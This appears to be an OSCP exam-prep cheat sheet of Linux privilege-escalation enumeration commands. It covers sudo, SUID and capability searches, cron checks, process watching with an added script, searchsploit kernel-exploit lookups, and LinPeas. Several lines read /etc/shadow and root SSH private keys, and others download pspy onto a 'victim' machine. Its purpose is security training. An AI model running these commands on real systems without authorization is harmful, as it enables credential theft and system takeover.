OSCP Exam Prep

Linux


Last updated 3 months ago

Online Resource

Points of Interest

Sudo Things

sudo -l
sudo -V | grep -i "sudo ver"

System Information

Basic system information: uname -a
CPU information: lscpu
Disk information: lsblk
USB information: lsusb
Distribution release: cat /etc/issue

Network: ss -nltp

User Roles

id
groups

Crontab

crontab -l
cat /etc/crontab

ls -lah /etc/cron.*
grep -i "CRON" /var/log/syslog

Special Bits

find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null

Interesting Files

cat /etc/passwd
cat /etc/shadow
cat /etc/hosts
ls -la /var/www
ls -la /opt

cat /root/.ssh/authorized_keys
cat /root/.ssh/id_rsa
cat /home/<user>/.ssh/id_rsa
cat /home/<user>/.ssh/id_ecdsa
cat /home/<user>/.ssh/authorized_keys

find / -name config.php -type f 2>/dev/null
find / -name doas.conf -type f 2>/dev/null
find / -name "apache*" -type d 2>/dev/null

find / -name "*.txt" -type f 2>/dev/null
find / -name "*.sh" -type f 2>/dev/null
find / -name ".ht*" -type f 2>/dev/null

find / -name id_rsa -type f 2>/dev/null
find / -name id_ecdsa -type f 2>/dev/null
find / -name authorized_keys -type f 2>/dev/null

find /home/ -name local.txt -type f 2>/dev/null
find /root/ -name proof.txt -type f 2>/dev/null
find / -name local.txt -type f 2>/dev/null
find / -name proof.txt -type f 2>/dev/null

Writable Directories

find / -writable -type d 2>/dev/null

Catch Repeating Processes

watch -n 1 "ps aux"
watch -n 1 "ps aux | grep -i <keyword>"

while sleep 1; do ps aux; done
while sleep 1; do ps aux | grep -i <keyword>; done
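
The loops above reprint the whole process table every second. The sketch below is an added example, not part of the original page: it keeps the snapshots and reports only command lines that were launched repeatedly under new PIDs, which is how scheduled jobs show up. It assumes a procps-style `ps` that accepts `-eo`; the function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original page); function names are hypothetical.

# snapshot: print "PID COMMAND LINE" for every process, skipping the
# helper processes this shell spawns to take the snapshot.
snapshot() {
    ps -eo pid=,ppid=,args= | awk -v me="$$" '
        $2 != me { pid = $1; $1 = $2 = ""; sub(/^ +/, ""); print pid, $0 }'
}

# repeated_cmds BASELINE SNAPSHOT...
# Processes already present in BASELINE are ignored (long-running daemons
# and their workers). Prints "COUNT<TAB>COMMAND" for every command line
# that was started under two or more new PIDs afterwards.
repeated_cmds() {
    awk '
        {
            pid = $1; $1 = ""; sub(/^ +/, "")   # $0 is now the command line
            if ((pid, $0) in seen) next          # same process, seen before
            seen[pid, $0] = 1
            if (FILENAME != ARGV[1]) starts[$0]++
        }
        END {
            for (cmd in starts)
                if (starts[cmd] >= 2) printf "%d\t%s\n", starts[cmd], cmd
        }
    ' "$@" | sort -t "$(printf '\t')" -k1,1nr -k2
}

# watch_repeats [COUNT] [INTERVAL]: take COUNT snapshots INTERVAL seconds
# apart (default 30 x 1s) and report what kept being re-launched.
watch_repeats() {
    wr_dir=$(mktemp -d) || return 1
    wr_i=0
    while [ "$wr_i" -lt "${1:-30}" ]; do
        snapshot > "$wr_dir/$(printf '%04d' "$wr_i")"
        sleep "${2:-1}"
        wr_i=$((wr_i + 1))
    done
    repeated_cmds "$wr_dir"/*
    rm -rf "$wr_dir"
}
```

Source the file and run `watch_repeats 120 1` to sample for two minutes. Polling misses processes that start and exit between two snapshots.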

Monitoring Processes with PsPy

On Kali Machine:
 wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
 python3 -m http.server 80
 
On Victim Machine:
 wget http://192.168.45.200/pspy64 && chmod +x pspy64
 ./pspy64

Reading Binaries

strings <file>

Finding Kernel Exploits

SearchSploit:
    searchsploit <keyword>
    searchsploit -m <EDB-ID>

For Kernel Vulnerabilities:
    searchsploit "linux kernel <distro version> Local Privilege Escalation" | grep "<kernel versions>"
    
    <distro version> = cat /etc/issue
    <kernel versions> = uname -r
    
    Example: searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v "< 4.4.0" | grep -v "4.8"

Automated Enumeration

LinPeas

On the Attacker:
    /usr/share/peass/linpeas/linpeas.sh
    /usr/share/peass/linpeas/linpeas_small.sh
    wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/linpeas.sh
    
Transfer the chosen script onto the compromised system.
Run it and review the output.

WADComs
GTFOBins